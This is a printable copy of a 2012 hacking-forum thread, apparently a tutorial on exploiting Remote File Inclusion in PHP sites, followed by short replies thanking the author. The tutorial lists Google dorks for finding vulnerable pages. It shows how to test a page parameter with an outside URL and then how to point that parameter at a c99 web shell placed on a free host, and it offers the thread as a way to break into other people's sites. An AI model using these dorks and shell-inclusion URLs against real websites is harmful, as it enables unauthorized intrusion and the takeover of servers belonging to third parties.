![]() |
|
Tutorial RFI - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Hacking (https://sinister.li/Forum-Hacking) +--- Forum: Website & Server Hacking (https://sinister.li/Forum-Website-Server-Hacking) +--- Thread: Tutorial RFI (/Thread-Tutorial-RFI) |
RFI - Merkuri - 11-08-2012 I haven't see tutorial about RFI here so I decide to write one You will need shell and free webhost that won't delete your account for the shell http://www.7host.com this is the host i recommend you can try cwahi.com but the last time they have delete my account You will need dorks to find vulnerable site which is hard those days ;( here are some Code: inurl:.php?link=
allinurl:.php?link=
inurl:.php?redirect=
allinurl:.php?redirect=
inurl:.php?page=
allinurl:.php?page=
inurl:.php?webpage=
allinurl:.php?webpage=What is RFI Code: Remote File Inclusion(RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.To test site for vulnerability after = write http://google.com if google load then the site is vulnerable Example Code: http://www.site.com/index.php?page=web.php
TEST
http://www.site.com/index.php?page=http://google.comTo exploit the vulnerability you just need to replace google with address to your shell Example Code: My shell link for example
http://www.host.com/c99.asp
http://www.site.com/index.php?page=http://www.host.com/c99.aspIts realy hard to find RFI since PHP5'5 update many pipl say that its 'death' RE: RFI - Mugetsu. - 11-08-2012 Nice share mate. This was really helpful.
RE: RFI - Crimson - 11-09-2012 I'll try this out sometime. Thanks for the share. RE: RFI - Bannedshee - 11-09-2012 nice gunna try this it mmight take time...
RE: RFI - Crow_SL - 11-09-2012 Nice tutorial, keep it up! I would like to see more tutorials in hacking section... RE: RFI - shizelkid - 11-10-2012 Do you need a paid web host or will a free one work!?!?! RE: RFI - Merkuri - 11-10-2012 (11-10-2012, 08:33 AM)shizelkid Wrote: Do you need a paid web host or will a free one work!?!?! For the shell ? free will do the job but they may delete your account |